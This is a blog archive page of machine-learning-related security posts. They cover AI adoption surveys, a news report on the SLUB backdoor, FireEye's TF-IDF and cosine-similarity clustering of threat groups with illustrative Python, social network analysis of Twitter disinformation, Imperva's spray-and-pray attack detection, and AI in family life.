Category Archives: machine learning

Orgs Say Yes to AI Use But Ask “What Is It?”

Organizations across the US and Japan have plans to increase their use of artificial intelligence (AI) and machine learning (ML) this year, yet many don’t really understand the technology, according to

The post Orgs Say Yes to AI Use But Ask “What Is It?” appeared first on The Cyber Security Place.

Is AI really intelligent or are its procedures just averagely successful?

Artificial intelligence (AI) and machine learning algorithms such as Deep Learning have become integral parts of our daily lives: they enable digital speech assistants or translation services, improve medical diagnostics and are an indispensable part of future technologies such as autonomous driving. Based on an ever-increasing amount of data and powerful novel computer architectures, learning algorithms appear to reach human capabilities, sometimes even exceeding them. The issue: so far it often remains unknown to … More

The post Is AI really intelligent or are its procedures just averagely successful? appeared first on Help Net Security.

Businesses recognize the need for AI & ML tools in cybersecurity

71 percent of businesses surveyed in the United States plan to use more artificial intelligence and machine learning (AI/ML) in their cybersecurity tools this year, although over half (58%) aren’t sure what that technology

The post Businesses recognize the need for AI & ML tools in cybersecurity appeared first on The Cyber Security Place.

SLUB Backdoor Receives Commands From GitHub and Communicates Through Slack

Security researchers have discovered that the new SLUB backdoor is receiving attack commands from GitHub and relying on Slack for communicating with its attackers.

Trend Micro detailed how this malware campaign began with watering hole attacks that redirected users to webpages hosting malicious code. Infection proceeded whenever these attacks reached a machine that had not been patched against CVE-2018-8174, a VBScript engine vulnerability Microsoft fixed back in May 2018.

Upon exploitation, the attack downloaded a dynamic-link library (DLL) and ran a PowerShell command. This process loaded a downloader that, in turn, downloaded and ran a second executable file containing the SLUB backdoor.

Detected as Backdoor.Win32.SLUB.A, the SLUB backdoor is a threat written in C++ that stands out for two reasons:

  • First, it embeds two authorization tokens to communicate with Slack’s application programming interface (API).
  • Second, it downloads a gist snippet from GitHub and parses it to search for commands.

The backdoor uses these two steps to post the result of its commands in a private Slack channel within a workspace using the embedded tokens. With this flow in place, digital attackers can use SLUB to take screen captures, create archive files and exfiltrate information.

The Ongoing Relevance of Watering Hole Attacks

This campaign isn’t the only recent operation to use watering hole attacks. For example, ESET detected one such campaign in November 2018, in which the OceanLotus group used watering hole attacks to target several websites in Southeast Asia. Several months later, ESET reported that the LuckyMouse APT group had preyed on the International Civil Aviation Organization using a watering hole attack.

These incidents illustrate how watering hole attacks pose an ongoing threat to organizations. Indeed, Carbon Black found that more than one-fifth (21 percent) of financial services companies had recently experienced this type of attack. Threat actors could use a successful attack in those cases to steal money and undermine customer trust in the financial institutions.

How to Defend Against Threats Like the SLUB Backdoor

Security professionals can defend against digital threats like the SLUB backdoor by using a layered security approach. This strategy should include machine learning and threat detection sandboxing to strengthen endpoint defenses against emerging threats, such as fileless malware.

Organizations should also practice risk-based vulnerability management to prioritize the software security flaws they should patch first.

The post SLUB Backdoor Receives Commands From GitHub and Communicates Through Slack appeared first on Security Intelligence.

Going ATOMIC: Clustering and Associating Attacker Activity at Scale

At FireEye, we work hard to detect, track, and stop attackers. As part of this work, we learn a great deal of information about how various attackers operate, including details about commonly used malware, infrastructure, delivery mechanisms, and other tools and techniques. This knowledge is built up over hundreds of investigations and thousands of hours of analysis each year. At the time of publication, we have 50 APT or FIN groups, each of which has distinct characteristics. We have also collected thousands of uncharacterized 'clusters' of related activity about which we have not yet made any formal attribution claims. While unattributed, these clusters are still useful in the sense that they allow us to group and track associated activity over time.

However, as the information we collect has grown larger and larger, we realized we needed an algorithmic method to assist in analyzing it at scale and to discover new potential overlaps and attributions. This blog post will outline the data we used to build the model, the algorithm we developed, and some of the challenges we hope to tackle in the future.

The Data

As we detect and uncover malicious activity, we group forensically-related artifacts into 'clusters'. These clusters indicate actions, infrastructure, and malware that are all part of an intrusion, campaign, or series of activities which have direct links. These are what we call our "UNC" or "uncategorized" groups. Over time, these clusters can grow, merge with other clusters, and potentially 'graduate' into named groups, such as APT33 or FIN7. This graduation occurs only when we understand enough about their operations in each phase of the attack lifecycle and have associated the activity with a state-aligned program or criminal operation.

For every group, we can generate a summary document that contains information broken out into sections such as infrastructure, malware files, communication methods, and other aspects. Figure 1 shows a fabricated example with the various 'topics' broken out. Within each 'topic' – such as 'Malware' – we have various 'terms', which have associated counts. These numbers indicate how often we have recorded a group using that 'term'.


Figure 1: Example group 'documents' demonstrating how data about groups is recorded

The Problem

Our end goal is always to merge a new group either into an existing group once the link can be proven, or to graduate it to its own group if we are confident it represents a new and distinct actor set. These clustering and attribution decisions have thus far been performed manually and require rigorous analysis and justification. However, as we collect increasingly more data about attacker activities, this manual analysis becomes a bottleneck. Clusters risk going unanalyzed, and potential associations and attributions could slip through the cracks. Thus, we now incorporate a machine learning-based model into our intelligence analysis to assist with discovery, analysis, and justification for these claims.

The model we developed began with the following goals:

  1. Create a single, interpretable similarity metric between groups
  2. Evaluate past analytical decisions
  3. Discover new potential matches


Figure 2: Example documents highlighting observed term overlaps between two groups

The Model

This model uses a document clustering approach, familiar in the data science realm and often explained in the context of grouping books or movies. Applying the approach to our structured documents about each group, we can evaluate similarities between groups at scale.

First, we decided to model each topic individually. This decision means that each topic will result in its own measure of similarity between groups, which will ultimately be aggregated to produce a holistic similarity measure.

Here is how we apply this to our documents.

Within each topic, every distinct term is transformed into a value using a method called term frequency-inverse document frequency, or TF-IDF. This transformation is applied to every unique term for every document and topic, and the basic intuition behind it is to:

  1. Increase the importance of the term if it occurs often within the document.
  2. Decrease the importance of the term if it appears commonly across all documents.

This approach rewards distinctive terms such as custom malware families – which may appear for only a handful of groups – and down-weights common things such as 'spear-phishing', which appear for the vast majority of groups.

Figure 3 shows an example of TF-IDF being applied to a fictional "UNC599" for two terms: mal.sogu and mal.threebyte. These terms indicate the usages of SOGU and THREEBYTE within the 'malware' topic and thus we calculate their value within that topic using TF-IDF. The first (TF) value is how often those terms appeared as a fraction of all malware terms for the group. The second value (IDF) is the inverse of how frequently those terms appear across all groups. Additionally, we take the natural log of the IDF value, to smooth the effects of highly common terms – as you can see in the graph, when the value is close to 1 (very common terms), the log evaluates to near-zero, thus down-weighting the final TF x IDF value. Unique values have a much higher IDF, and thus result in higher values.
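To make the arithmetic concrete, here is a minimal sketch of this per-topic TF-IDF weighting in Python. The group names, terms, and counts below are invented for illustration and are not real FireEye data.

```python
import math
from collections import Counter

# Invented 'malware' topic counts for a few groups (illustration only).
malware_topic = {
    "UNC599": Counter({"mal.sogu": 9, "mal.threebyte": 1}),
    "UNC123": Counter({"mal.sogu": 2, "mal.spearphish.doc": 8}),
    "APT_X":  Counter({"mal.threebyte": 5, "mal.custom.rat": 5}),
}

def tf_idf(group, term, topic):
    """TF: the term's count as a fraction of all the group's terms in this topic.
    IDF: natural log of (number of groups / number of groups that use the term)."""
    counts = topic[group]
    tf = counts[term] / sum(counts.values())
    n_groups = len(topic)
    n_with_term = sum(1 for c in topic.values() if c[term] > 0)
    idf = math.log(n_groups / n_with_term)
    return tf * idf

print(tf_idf("UNC599", "mal.sogu", malware_topic))       # frequent for the group -> higher weight
print(tf_idf("UNC599", "mal.threebyte", malware_topic))  # rare for the group -> lower weight
```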


Figure 3: Breakdown of TF-IDF metric when evaluated for a single group in regard to malware

Once each term has been given a score, each group is now reflected as a collection of distinct topics, and each topic is a vector of scores for the terms it contains. Each vector can be conceived as an arrow, detailing the 'direction' that group is 'pointing' within that topic.

Within each topic space, we can then evaluate the similarity of various groups using another method – Cosine Similarity. If, like me, you did not love trigonometry – fear not! The intuition is simple. In essence, this is a measure of how parallel two vectors are. As seen in Figure 4, to evaluate two groups' usage of malware, we plot their malware vectors and see if they are pointing in the same direction. More parallel means they are more similar.
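As a rough sketch (again with made-up vectors), the per-topic cosine similarity between two groups can be computed like this:

```python
import math

def cosine_similarity(vec_a, vec_b):
    """Cosine of the angle between two sparse term-score vectors
    (dicts mapping term -> TF-IDF score). 1.0 = parallel, 0.0 = orthogonal."""
    dot = sum(vec_a[t] * vec_b[t] for t in set(vec_a) & set(vec_b))
    norm_a = math.sqrt(sum(v * v for v in vec_a.values()))
    norm_b = math.sqrt(sum(v * v for v in vec_b.values()))
    return dot / (norm_a * norm_b) if norm_a and norm_b else 0.0

# Invented TF-IDF vectors for the 'malware' topic of two groups.
unc599 = {"mal.sogu": 0.36, "mal.threebyte": 0.04}
apt_x  = {"mal.sogu": 0.30, "mal.threebyte": 0.02, "mal.custom.rat": 0.25}
print(cosine_similarity(unc599, apt_x))  # roughly 0.77: the shared SOGU/THREEBYTE usage dominates
```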


Figure 4: Simplified breakdown of Cosine Similarity metric when applied to two groups in the malware 'space'

One of the nice things about this approach is that large and small vectors are treated the same – thus, a new, relatively small UNC cluster pointing in the same direction as a well-documented APT group will still reflect a high level of similarity. This is one of the primary use cases we have, discovering new clusters of activity with high similarity to already established groups.

Using TF-IDF and Cosine Similarity, we can now calculate the topic-specific similarities for every group in our corpus of documents. The final step is to combine these topic similarities into a single, aggregate metric (Figure 5). This single metric allows us to quickly query our data for 'groups similar to X' or 'similarity between X and Y'. The question then becomes: What is the best way to build this final similarity?


Figure 5: Overall model flow diagram showing individual topic similarities and aggregation into the final similarity matrix

The simplest approach is to take an average, and at first that’s exactly what we did. However, this approach did not square with analyst intuition: as analysts, we feel that some topics matter more than others. Malware and methodologies should be more important than, say, server locations or target industries...right? Yet when challenged to provide custom weightings for each topic, we found it impossible to produce an objective weighting system free from analyst bias. Finally, we thought: "What if we used existing, known data to tell us what the right weights are?" To do that, we needed a lot of known – or "labeled" – examples of both similar and dissimilar groups.

Building a Labeled Dataset

At first our concept seemed straightforward: We would find a large dataset of labeled pairs, and then fit a regression model to accurately classify them. If successful, this model should give us the weights we wanted to discover.

Figure 6 shows some graphical intuition behind this approach. First, using a set of ‘labeled’ pairs, we fit a function which best predicts the data points.


Figure 6: Example Linear regression plot – in reality we used a Logistic Regression, but showing a linear model to demonstrate the intuition

Then, we use that same function to predict the aggregate similarity of un-labeled pairs (Figure 7).


Figure 7: Example of how we used the trained model to predict final similarity from individual topic similarities.

However, our data posed a unique problem in the sense that only a tiny fraction of all potential pairings had ever been analyzed. These analyses happened manually and sporadically, often the result of sudden new information from an investigation finally linking two groups together. As a labeled dataset, these pairs were woefully insufficient for any rigorous evaluation of the approach. We needed more labeled data.

Two of our data scientists suggested a clever approach: What if we created thousands of 'fake' clusters by randomly sampling from well-established APT groups? We could therefore label any two samples that came from the same group as definitely similar, and any two from separate groups as not similar (Figure 8). This gave us the ability to synthetically generate the labeled dataset we desperately needed. Then, using a regression model, we were able to elegantly solve this 'weighted average' problem rather than depend on subjective guesses.
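The sketch below illustrates that idea with scikit-learn: sample pairs of synthetic clusters, label them as same-group or different-group, and fit a regression over the per-topic similarities so the learned coefficients serve as topic weights. The topic list and the simulated similarity values are fabricated for illustration; they are not FireEye's actual features or weights.

```python
import numpy as np
from sklearn.linear_model import LogisticRegression

rng = np.random.default_rng(0)
topics = ["malware", "methodology", "infrastructure", "targeting"]

def simulated_topic_similarities(same_group):
    """Stand-in for computing per-topic similarities between two synthetic clusters;
    same-group pairs tend to score higher on every topic."""
    base = rng.uniform(0.5, 0.9, len(topics)) if same_group else rng.uniform(0.0, 0.4, len(topics))
    return np.clip(base + rng.normal(0, 0.05, len(topics)), 0.0, 1.0)

X = np.array([simulated_topic_similarities(label) for label in [True] * 500 + [False] * 500])
y = np.array([1] * 500 + [0] * 500)

model = LogisticRegression().fit(X, y)
for topic, weight in zip(topics, model.coef_[0]):
    print(f"{topic:15s} learned weight: {weight:.2f}")

# Aggregate similarity for a new, unlabeled pair of clusters:
new_pair = np.array([[0.7, 0.2, 0.6, 0.1]])
print("aggregate similarity:", model.predict_proba(new_pair)[0, 1])
```

In this framing, the regression coefficients play the role of the topic weights we could not agree on by hand.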


Figure 8: Example similarity testing with 'fake' clusters derived from known APT groups

Additionally, these synthetically created clusters gave us a dataset upon which to test various iterations of the model. What if we remove a topic? What if we change the way we capture terms? Using a large labeled dataset, we can now benchmark and evaluate performance as we update and improve the model.

To evaluate the model, we observe several metrics:

  • Recall for synthetic clusters we know come from the same original group – how many do we get right/wrong? This evaluates the accuracy of a given approach.
  • For individual topics, the 'spread' between the calculated similarity of related and unrelated clusters. This helps us identify which topics help separate the classes best.
  • The accuracy of a trained regression model, as a proxy for the 'signal' between similar and dissimilar clusters, as represented by the topics. This can help us identify overfitting issues as well.
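For example, the first two checks above reduce to a few lines of arithmetic; the labels and similarity scores here are fabricated purely to show the shape of the calculation.

```python
import numpy as np

# Fabricated evaluation data: 1 = the pair of synthetic clusters truly shares a parent group.
true_same = np.array([1, 1, 1, 1, 0, 0, 0, 0])
predicted_same = np.array([1, 1, 0, 1, 0, 1, 0, 0])  # model decisions at some threshold

# Recall on same-group pairs: how many related pairs did we correctly recover?
recall = (predicted_same[true_same == 1] == 1).mean()
print("recall on same-group pairs:", recall)  # 3 of 4 -> 0.75

# Per-topic 'spread': mean similarity of related pairs minus that of unrelated pairs.
malware_similarity = np.array([0.8, 0.7, 0.4, 0.9, 0.1, 0.5, 0.2, 0.3])
spread = malware_similarity[true_same == 1].mean() - malware_similarity[true_same == 0].mean()
print("malware topic spread:", spread)  # larger spread -> the topic separates the classes better
```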

Operational Use

In our daily operations, this model serves to augment and assist our intelligence experts. Presenting objective similarities, it can challenge biases and introduce new lines of investigation not previously considered. When dealing with thousands of clusters and new ones added every day from analysts around the globe, even the most seasoned and aware intel analyst could be excused for missing a potential lead. However, our model is able to present probable merges and similarities to analysts on demand, and thus can assist them in discovery.

Upon deploying this to our systems in December 2018, we immediately found benefits. One example is outlined in this blog post about potentially destructive attacks. Since then we have been able to inform, discover, or justify dozens of other merges.

Future Work

Like all models, this one has its weaknesses and we are already working on improvements. There is label noise in the way we manually enter information from investigations. There is sometimes 'extraneous' data about attackers that is not (yet) represented in our documents. Most of all, we have not yet fully incorporated the 'time of activity' and instead rely on 'time of recording'. This introduces a lag in our representation, which makes time-based analysis difficult. What an attacker has done lately should likely mean more than what they did five years ago.

Taking this objective approach and building the model has not only improved our intel operations, but also highlighted data requirements for future modeling efforts. As we have seen in other domains, building a machine learning model on top of forensic data can quickly highlight potential improvements to data modeling, storage, and access. Further information on this model can also be viewed in this video, from a presentation at the 2018 CAMLIS conference.

We have thus far enjoyed taking this approach to augmenting our intelligence model and are excited about the potential paths forward. Most of all, we look forward to the modeling efforts that help us profile, attribute, and stop attackers.

A week in security (March 4 – 11)

Last week, Malwarebytes Labs released its in-depth, international data privacy survey of nearly 4,000 individuals, revealing that every generation, including Millennials, cares about online privacy. We also covered a novel case of zombie email that involved a very much alive account user, delved into the typical data privacy laws a US startup might have to comply with on its journey to success, and spotlighted the Troldesh ransomware, also known as “Shade.”

Other security news

Stay safe, everyone!

The post A week in security (March 4 – 11) appeared first on Malwarebytes Labs.

Why Social Network Analysis Is Important

I got into social network analysis purely for nerdy reasons – I wanted to write some code in my free time, and python modules that wrap Twitter’s API (such as tweepy) allowed me to do simple things with just a few lines of code. I started off with toy tasks (like mapping the time of day that @realDonaldTrump tweets), and then moved on to creating tools to fetch and process streaming data, which I used to visualize trends during some recent elections.
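For what it's worth, that time-of-day experiment needs only a handful of lines with tweepy. The sketch below assumes tweepy 3.x-era authentication and placeholder API keys; Twitter's API and access rules have changed since, so treat it as an illustration rather than a recipe.

```python
from collections import Counter
import tweepy

# Placeholder credentials: substitute your own application keys.
auth = tweepy.OAuthHandler("CONSUMER_KEY", "CONSUMER_SECRET")
auth.set_access_token("ACCESS_TOKEN", "ACCESS_TOKEN_SECRET")
api = tweepy.API(auth)

# Tally the UTC hour of each of the account's recent tweets.
hours = Counter()
for tweet in tweepy.Cursor(api.user_timeline, screen_name="realDonaldTrump").items(1000):
    hours[tweet.created_at.hour] += 1

# Crude text histogram of tweeting activity by hour.
for hour in sorted(hours):
    print(f"{hour:02d}:00 {'#' * hours[hour]}")
```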

The more I work on these analyses, the more I’ve come to realize that there are layers upon layers of insights that can be derived from the data. There’s data hidden inside data – and there are many angles you can view it from, all of which highlight different phenomena. Social network data is like a living organism that changes from moment to moment.

Perhaps some pictures will help explain this better. Here’s a visualization of conversations about Brexit that happened between the 3rd and 4th of December, 2018. Each dot is a user, and each line represents a reply, mention, or retweet.

Tweets supportive of the idea that the UK should leave the EU are concentrated in the orange-colored community at the top. Tweets supportive of the UK remaining in the EU are in blue. The green nodes represent conversations about the UK’s Labour party, and the purple nodes reflect conversations about Scotland. Names of accounts that were mentioned more often appear in a larger font.
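Graphs like these can be assembled from raw interaction records with a library such as networkx. The toy sketch below (with invented users) shows the basic idea: users as nodes, interactions as weighted edges, and communities found by modularity clustering, which is roughly how the colored clusters in these visualizations emerge.

```python
import networkx as nx

# Each record is (source_user, target_user) for a reply, mention, or retweet.
# The users and interactions below are invented purely for illustration.
interactions = [
    ("alice", "leave_now"), ("bob", "leave_now"), ("alice", "bob"),
    ("carol", "remain_in"), ("dave", "remain_in"), ("carol", "dave"),
    ("bob", "carol"),  # a lone bridge between the two camps
]

G = nx.Graph()
for source, target in interactions:
    if G.has_edge(source, target):
        G[source][target]["weight"] += 1  # weight repeated interactions more heavily
    else:
        G.add_edge(source, target, weight=1)

# Detect communities (e.g. 'leave' vs 'remain') by greedy modularity maximization.
communities = nx.algorithms.community.greedy_modularity_communities(G, weight="weight")
for i, members in enumerate(communities):
    print(f"community {i}: {sorted(members)}")

# Accounts mentioned most often (highest weighted degree) get the largest labels.
print(sorted(G.degree(weight="weight"), key=lambda kv: kv[1], reverse=True))
```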

Here’s what the conversation space looked like between the 14th and 15th of January, 2019.

Notice how the shape of the visualization has changed. Every snapshot produces a different picture that reflects the opinions, issues, and participants in that particular conversation space at the moment it was recorded. Here’s one more – this time from the 20th to 21st of January, 2019.

Every interaction space is unique. Here’s a visual representation of interactions between users and hashtags on Twitter during the weekend before the Finnish presidential elections that took place in January of 2018.

And here’s a representation of conversations that happened in the InfoSec community on Twitter between the 15th and 16th of March, 2018.

I’ve been looking at Twitter data on and off for a couple of years now. My focus has been on finding scams, social engineering, disinformation, sentiment amplification, and astroturfing campaigns. Even though the data is readily available via Twitter’s API, and plenty of the analysis can be automated, oftentimes finding suspicious activity just involves blind luck – the search space is so huge that you have to be looking in the right place, at the right time, to find it. One approach is, of course, to think like the adversary. Social networks run on recommendation algorithms that can be probed and reverse engineered. Once an adversary understands how those underlying algorithms work, they’ll game them to their advantage. These tactics share many analogies with search engine optimization methodologies. One approach to countering malicious activities on these platforms is to devise experiments that simulate the way attackers work, and then design appropriate detection methods, or countermeasures against these. Ultimately, it would be beneficial to have automation that can trace suspicious activity back through time, to its source, visualize how the interactions propagated through the network, and provide relevant insights (that can be queried using natural language). Of course, we’re not there yet.

The way social networks present information to users has changed over time. In the past, Twitter feeds contained a simple, sequential list of posts published by the accounts a user followed. Nowadays, Twitter feeds are made up of recommendations generated by the platform’s underlying models – what they understand about a user, and what they think the user wants to see.

A potentially dystopian outcome of social networks was outlined in a blog post written by François Chollet in May 2018, in which he describes social media becoming a “psychological panopticon”.

The premise for his theory is that the algorithms that drive social network recommendation systems have access to every user’s perceptions and actions. Algorithms designed to drive user engagement are currently rather simple, but if more complex algorithms (for instance, based on reinforcement learning) were to be used to drive these systems, they may end up creating optimization loops for human behavior, in which the recommender observes the current state of each target (user) and keeps tuning the information that is fed to them, until the algorithm starts observing the opinions and behaviors it wants to see. In essence the system will attempt to optimize its users. Here are some ways these algorithms may attempt to “train” their targets:

  • The algorithm may choose to only show its target content that it believes the target will engage or interact with, based on the algorithm’s notion of the target’s identity or personality. Thus, it will cause a reinforcement of certain opinions or views in the target, based on the algorithm’s own logic. (This is partially true today)
  • If the target publishes a post containing a viewpoint that the algorithm doesn’t wish the target to hold, it will only share it with users who would view the post negatively. The target will, after being flamed or down-voted enough times, stop sharing such views.
  • If the target publishes a post containing a viewpoint the algorithm wants the target to hold, it will only share it with users that would view the post positively. The target will, after some time, likely share more of the same views.
  • The algorithm may place a target in an “information bubble” where the target only sees posts from friends that share the target’s views (that are desirable to the algorithm).
  • The algorithm may notice that certain content it has shared with a target caused their opinions to shift towards a state (opinion) the algorithm deems more desirable. As such, the algorithm will continue to share similar content with the target, moving the target’s opinion further in that direction. Ultimately, the algorithm may itself be able to generate content to those ends.

Chollet goes on to mention that, although social network recommenders may start to see their users as optimization problems, a bigger threat still arises from external parties gaming those recommenders in malicious ways. The data available about users of a social network can already be used to predict when a user is suicidal, or when a user will fall in love or break up with their partner, and content delivered by social networks can be used to change users’ moods. We also know that this same data can be used to predict which way a user will vote in an election, and the probability of whether that user will vote or not.

If this optimization problem seems like a thing of the future, bear in mind that, at the beginning of 2019, YouTube made changes to its recommendation algorithms exactly because of the problems they were causing for certain members of society. Guillaume Chaslot posted a Twitter thread in February 2019 that described how YouTube’s algorithms favored recommending conspiracy theory videos, guided by the behaviors of a small group of hyper-engaged viewers. Fiction is often more engaging than fact, especially for users who spend all day, every day watching YouTube. As such, the conspiracy videos watched by this group of chronic users received high engagement, and thus were pushed up the recommendation system. Driven by these high engagement numbers, the makers of these videos created more and more content, which was, in turn, viewed by this same group of users. YouTube’s recommendation system was optimized to pull more and more users into a hole of chronic YouTube addiction. Many of the users sucked into this hole have since become indoctrinated with right-wing extremist views. One such user actually became convinced that his brother was a lizard, and killed him with a sword. Chaslot has since created a tool that allows users to see which of these types of videos are being promoted by YouTube.

Social engineering campaigns run by entities such as the Internet Research Agency, Cambridge Analytica, and the far-right demonstrate that social media advert distribution platforms (such as those on Facebook) have provided a weapon for malicious actors that is incredibly powerful, and damaging to society. The disruption caused by their recent political campaigns has created divides in popular thinking and opinion that may take generations to repair. Now that the effectiveness of these social engineering techniques is apparent, I expect what we’ve seen so far is just an omen of what’s to come.

The disinformation we hear about is only a fraction of what’s actually happening. It requires a great deal of time and effort for researchers to find evidence of these campaigns. As I already noted, Twitter data is open and freely available, and yet it can still be extremely tedious to find evidence of disinformation campaigns on that platform. Facebook’s targeted ads are only seen by the users who were targeted in the first place. Unless those who were targeted come forward, it is almost impossible to determine what sort of ads were published, who they were targeted at, and what the scale of the campaign was. Although social media platforms now enforce transparency on political ads, the source of these ads must still be determined in order to understand who’s being targeted, and by what content.

Many individuals on social networks share links to “clickbait” headlines that align with their personal views or opinions (sometimes without having read the content behind the link). Fact checking is uncommon, and often difficult for people who don’t have a lot of time on their hands. As such, inaccurate or fabricated news, headlines, or “facts” propagate through social networks so quickly that even if they are later refuted, the damage is already done. This mechanism forms the very basis of malicious social media disinformation. A well-documented example of this was the UK’s “Leave” campaign that was run before the Brexit referendum. Some details of that campaign are documented in the recent Channel 4 film: “Brexit: The Uncivil War”.

It’s not just the engineers of social networks who need to understand how they work and how they might be abused. Social networks are a relatively new form of human communication, and have only been around for a few decades. But they’re part of our everyday lives, and obviously they’re here to stay. Social networks are a powerful tool for spreading information and ideas, and an equally powerful weapon for social engineering, disinformation, and propaganda. As such, research into these systems should be of interest to governments, law enforcement, cyber security companies and organizations that seek to understand human communications, culture, and society.

The potential avenues of research in this field are numerous. Whilst my research with Twitter data has largely focused on graph analysis methodologies, I’ve also started experimenting with natural language processing techniques, which I feel have a great deal of potential.

The Orville, “Majority Rule”. A vote badge worn by all citizens of the alien world Sargus 4, allowing the wearer to receive positive or negative social currency. Source: youtube.com

We don’t yet know how much further social networks will integrate into society. Perhaps the future will end up looking like the “Majority Rule” episode of The Orville, or the “Nosedive” episode of Black Mirror, both of which depict societies in which each individual’s social “rating” determines what they can and can’t do and where a low enough rating can even lead to criminal punishment.

How Imperva’s New Attack Crowdsourcing Secures Your Business’s Applications

Attacks on applications can be divided into two types: targeted attacks and “spray and pray” attacks. Targeted attacks require planning and usually include a reconnaissance phase, where attackers learn all they can about the target organization’s IT stack and application layers. Targeted application attacks are vastly outnumbered by spray and pray attacks. The perpetrators of spray and pray attacks are less discriminating about their victims. Their goal is to find and steal anything that can be leveraged or sold on the dark web. Sometimes spray and pray attacks are used for reconnaissance, and later develop into a targeted attack.

One famous wave of spray and pray attacks took place against Drupal, the popular open-source content management system (CMS). In March 2018, Drupal reported a highly critical vulnerability (CVE-2018-7600) that earned the nickname, Drupalgeddon 2. This vulnerability enables an attacker to run arbitrary code on common Drupal versions, affecting millions of websites. Tools exploiting this weakness became widely available, which caused the number of attacks on Drupal sites to explode.

The ability to identify spray and pray attacks is an important insight for security personnel. It can help them prioritize which attacks to investigate, evaluate the true risk to their application, and/or identify a sniffing attack that could be a precursor to a more serious targeted one.

Identifying Spray and Pray Attacks in Attack Analytics

Attack Analytics, launched in May 2018, aims to crush the maddening pace of alerts that security teams receive. For security analysts unable to triage this alert avalanche, Attack Analytics condenses thousands upon thousands of alerts into a handful of relevant, investigable incidents. Powered by artificial intelligence, Attack Analytics automates what would take a team of security analysts days to investigate and cuts that investigation time down to a matter of minutes.

We recently updated Attack Analytics to provide a list of spray and pray attacks that may hit your business as part of a larger campaign. We researched these attacks using crowdsourced attack data gathered with permission from our customers. This insight is now presented in our Attack Analytics dashboard, as can be seen in the red circled portion of Figure 1 below.

Figure 1: Attack Analytics Dashboard

Clicking on the Similar Incidents Insights section shows more detail on the related attacks (Figure 2). An alternative way to get the list of spray and pray incidents potentially affecting the user is to log in to the console and use the “How common” filter.

Figure 2: Attack Analytics Many Customers Filter


A closer view of the incidents will tell you the common attributes of the attack affecting other users (Figure 3).

Figure 3: Attack Analytics Incident Insights

How Our Algorithm Works

The algorithm that identifies spray and pray attacks examines incidents across Attack Analytics customers. When similar incidents appear across a large number of customers within a short window of time, we identify this as a likely spray and pray attack originating from the same source. Determining the similarity of incidents requires domain knowledge, and is based on a combination of factors, such as:

  • The attack source: Network source (IP/Subnet), Geographic location
  • The attack target: URL, Host, Parameters
  • The attack time: Duration, Frequency
  • The attack type: Triggered rule
  • The attack tool: Tool name, type & parameters

In some spray and pray attacks, the origin of the attack is the most valuable piece of information connecting multiple incidents. In a distributed attack, the origin is not relevant, and the other factors carry the weight. In many cases, a spray and pray attack will be aimed at the same group of URLs.

Another significant common factor is the attack type, in particular, a similar set of rules that were violated in the Web Application Firewall (WAF). Sometimes, the same tools are observed, or the tools belong to the same type of attacks. The time element is also key, especially the duration of the attack or the frequency.
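A deliberately simplified sketch of this kind of cross-customer grouping is shown below. The attribute names, weights, and threshold are invented for illustration; they are not Imperva's actual algorithm, which combines many more signals.

```python
from itertools import combinations

# Invented incident records from different customer accounts.
incidents = [
    {"id": 1, "customer": "A", "source_subnet": "203.0.113.0/24", "url": "/wp-login.php", "rule": "RCE-1"},
    {"id": 2, "customer": "B", "source_subnet": "203.0.113.0/24", "url": "/wp-login.php", "rule": "RCE-1"},
    {"id": 3, "customer": "C", "source_subnet": "198.51.100.0/24", "url": "/api/v1/users", "rule": "SQLI-7"},
]

# Hypothetical weights reflecting how strongly each shared attribute ties incidents together.
WEIGHTS = {"source_subnet": 0.4, "url": 0.3, "rule": 0.3}
THRESHOLD = 0.6

def similarity(a, b):
    return sum(w for attr, w in WEIGHTS.items() if a[attr] == b[attr])

# Incidents from *different* customers that score above the threshold are
# candidates for the same spray and pray campaign.
for a, b in combinations(incidents, 2):
    if a["customer"] != b["customer"] and similarity(a, b) >= THRESHOLD:
        print(f"incidents {a['id']} and {b['id']} look like the same campaign "
              f"(similarity {similarity(a, b):.1f})")
```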

Results and Findings

The Attack Analytics algorithm is designed to identify groups of cross-account incidents. Each group has a set of common features that ties the incidents together. When we reviewed the results and the characteristics of various groupings, we discovered interesting patterns. First, most attacks (83.3%) were common among customers (Figure 4). Second, most attacks (67.4%) belong to groups with a single source, meaning the attack came from the same IP address. Third, Bad Bot attacks still have a significant presence (41.1%). In 14.8% of the attacks, a common resource (like a URL) was attacked.

Figure 4: Spray & Pray Incidents Spread

Here’s an interesting example – a spray and pray attack from a single IP that attacked 1,368 customers over the same 3 consecutive days with the same vulnerability scanner, LTX71. We’ve also seen Bad Bots illegally accessing resources, attacking from the same subnet located in Illinois using a Trustwave vulnerability scanner. These bots performed a URL scan on our customers’ resources – an attack which was blocked by our Web Application Firewall (WAF). Another attack involved a German IP trying to access the same WordPress-created system files on more than 50 different customers using cURL. And the list goes on.

Focusing on single-source spray and pray incidents has shown that these attacks affect a significant percentage of our customers. For example, in Figure 5 we see that the leading attack came from one Ukrainian IP that hit at least 18.49% of our customers. Almost every day, one malicious IP would attack a significant percentage of our customers.

Figure 5: Single Source Spray & Pray Accounts Affected

More Actionable Insights Coming

Identifying spray and pray attacks is a great example of using the intelligence from Imperva’s customer community to create insights that will help speed up your security investigations. Spray and pray attacks are not the only way of adding insights from community knowledge. Using machine-learning algorithms combined with domain knowledge, we plan to add more security insights like these to our Attack Analytics dashboard in the near future.

The post How Imperva’s New Attack Crowdsourcing Secures Your Business’s Applications appeared first on Blog.

AI & Your Family: The Wows and Potential Risks

Am I the only one? When I hear or see the word Artificial Intelligence (AI), my mind instantly defaults to images from sci-fi movies I’ve seen like I, Robot, Matrix, and Ex Machina. There’s always been a futuristic element — and self-imposed distance — between AI and myself.

But AI is anything but futuristic or distant. AI is here, and it’s now. And, we’re using it in ways we may not even realize.

AI has been woven throughout our lives for years in various expressions of technology. AI is in our homes, workplaces, and our hands every day via our smartphones.

Just a few everyday examples of AI:

  • Cell phones with built-in smart assistants
  • Toys that listen and respond to children
  • Social networks that determine what content you see
  • Social networking apps with fun filters
  • GPS apps that help you get where you need to go
  • Movie apps that predict what show you’d enjoy next
  • Music apps that curate playlists that echo your taste
  • Video games that deploy bots to play against you
  • Advertisers who follow you online with targeted ads
  • Refrigerators that alert you when food is about to expire
  • Home assistants that carry out voice commands
  • Flights you take that operate via an AI autopilot

The Technology

While AI sounds a little intimidating, it’s not when you break it down. AI is technology that can be programmed to accomplish a specific set of goals without assistance. In short, it’s a computer’s ability to be predictive — to process data, evaluate it, and take action.

AI is being implemented in education, business, manufacturing, retail, transportation, and just about any other sector of industry and culture you can imagine. It’s the smarter, faster, more profitable way to accomplish manual tasks.

